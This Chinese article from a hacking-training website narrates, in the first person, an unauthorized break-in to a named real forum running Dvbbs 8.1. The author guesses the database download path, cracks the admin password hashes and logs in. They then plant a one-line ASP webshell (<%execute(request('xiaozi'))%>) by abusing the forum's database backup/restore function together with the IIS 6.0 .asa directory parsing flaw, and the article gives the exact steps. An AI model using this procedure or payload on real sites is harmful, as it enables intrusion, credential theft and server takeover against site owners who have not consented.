首页 实地培训 VIP专区 文章中心 下载中心 精品动画 安全服务 安全产品 企业文化
技术论坛
 -->开创网络首先基于以学员为中心的人性化教学方式。以案例式教学、互动式教学为主线。
 
  当前位置: 首页 > 文章中心 > 攻防实战 >
 
 
入侵暗黑小组
发布者ID:3 作者: 发布时间:2008-08-04 08:49:11 来源: 点击:
 

作者:网络小子 Www.YkHack.Com

    目标站(www.an81.cn)  图.1 一个貌似黑客站的BBs论坛



 
    进去一看,是一个Dvbbs8.1的论坛,还好是8.1的要是8.2的就算搞到了后台也搞不到Shell.至少现在不行。这个论坛勉强。在线几百人.动网的管理员默认帐号密码
admin
admin888
试了一下。不对。又试了admin an81 an81 an81 都不对。意料之中。。。
动网的默认数据库地址
http://www.an81.cn/data/dvbbs8.mdb  也不对。
手工猜解数据库地址,在我搞站的时候,如果找到了数据库的目录,或者后台的目录,我已经习惯性的对目标猜解一会。
http://www.an81.cn/data/dvbbs8.mdb      不对
http://www.an81.cn/data/%23dvbbs8.mdb   不对
http://www.an81.cn/data/an81.mdb        不对
http://www.an81.cn/data/an81dvbbs8.mdb  Yes
在我试到data/an81dvbbs8.mdb这个连接的时候弹出了数据库下在提示。嘿嘿。机会来了。  图.2
 
用讯雷把数据库下载下来了。用辅臣数据库浏览。得到三个管理员帐号, 图.3
 
管理员帐号为:zhang6423987
管理员帐号为:9dec0bc601516b06
打开www.cmd5.com解密 提示
Found
本记录已查到,这是一条付费记录。

还好我朋友送了我一个md5网站上的VIP,登陆,解密。拿到密码去网站登陆提示错误。难道是前台跟后台
的管理不一样?还是这个管理。。。。。郁闷中,跑回数据库前台看了一下。发现都是一样的。
忽然有一个想法出现在我的脑海。貌似这个数据库是假。。的

不管在试试第二个
管理员帐号为:华宇科技
管理员帐号为:385387d8e143c8ea
MD解出来的密码为:6423987

登陆,提示登陆成功,后台的帐号密码跟前台的一样。 图.4 .5
关于动网8.1在后台怎么获取WebShell,Hackest的BLOG有相关文章。


 
 

拿动网Shell有两个方法
1.是在服务器支持PHP脚本的情况下。添加上传

进入后台,在“版面管理”随便找一个版块,进入“高级设置”,找到“上传文件类型”添加一个PHP文件类型。

但是这个网站不支持PHP脚本所以我失败了。
下面我就来讲将第二种方法

2.首先我门下载一个Microsoft Office 2000 简体中文版,安装好后,浏览数据库文件,
能不能拿到WebShell还的看看IIS是不是6.0的,论坛支持不支持上传。

如果两个都具备那么拿下Shell就很简单了。

拿Shell第一步。
1.把Data目录下的Dvbbs8.mdb复制出来,删掉除Dv_TableList以外的所有表段。
2.在TableType字段里插入数据,内容为一句话ASP木马<%execute(request("xiaozi"))%>
3.转换数据库文件内容大小。  图.6 .7
 
 




有些人问为什么要转换数据库呢?因为动网默认支持上传大小为200Kb.
我们没有转换的数据库大小为
7.59 MB (7,966,720 字节)
转换后的数据库大小为
68.0 KB (69,632 字节)  这就是我们为什么要转换的理由,只有转换了大小后才能上传。

把我们刚才转换的数据库文件后缀改为txt,在前台以文本文档格式上传。上传好后发表文章到后台-点击文件管理-上传文件管理,得到我们刚上传的文件绝对途径:
http://www.an81.cn/UploadFile/2008-8/200882151946806.txt
进入后台备份一下论坛的当前数据库,记下备份的文件名,确保过会能恢复回来。
备份数据库成功,您备份的数据库路径为../Databackup/databack200882171942_90345.mdb  图.8
 

打开恢复论坛数据页面,“备份数据库路径”处填入.. /UploadFile/2008-8/200882151946806.txt 然后
点“恢复数据”后返回“成功恢复数据”。   图.9
 

打开备份论坛数据页面,“备份数据库目录”处改为../xz.asa ,然后点确定,返回成功,得到的W
ebshell地址为:../xz.asa/databack200882171942_90345.mdb
那么Shell的完整途径就是http://www.an81.cnxizozi.asa/databack200882171942_90345.mdb访问一下,
成功了  图.10
 
然后我们在把我们刚才第一次备份的数据恢复一下,以防止论坛访问出错。
最后用一句话木马连接,-环境变量-得到网站跟目录途径。
然后上传ASP木马成功得到目标站的WebShell.   图.11


 这次入侵就这样吧,为了搞下这个站我今天中午都没回家吃饭。
今天就是给大家讲讲入侵思路。
就象鱼哥(伤心的鱼)说的那句话一样。
入侵就那么几种方法,懂得合理的资源利用,那才是王道。


 
 
 
 
   
 
   
     
  • 课堂实景
  • 课程体系
  • 培训课程
  • 巧用mstsc命令登录到console的方法
  • 学费介绍
  • 课程介绍
  • 团队介绍
  • Linkideo免费Vpn
  • 就业前景
  • 汇款方式
    		•
     
     
     
    无标题文档
    一流开创网一流开创网一流开创网一流开创网一流开创网一流开创网一流开创网
      关于我们 | 联系方法 | 招聘信息 | 加入会员 | 诚征代理 | 广告服务 | 欢迎投稿 | 友情链接  
      版权所有:吉林省开创科技信息有限公司  
      服务热线:0431-84714442
    Copyright 2001 - 2007 All Rights Reserved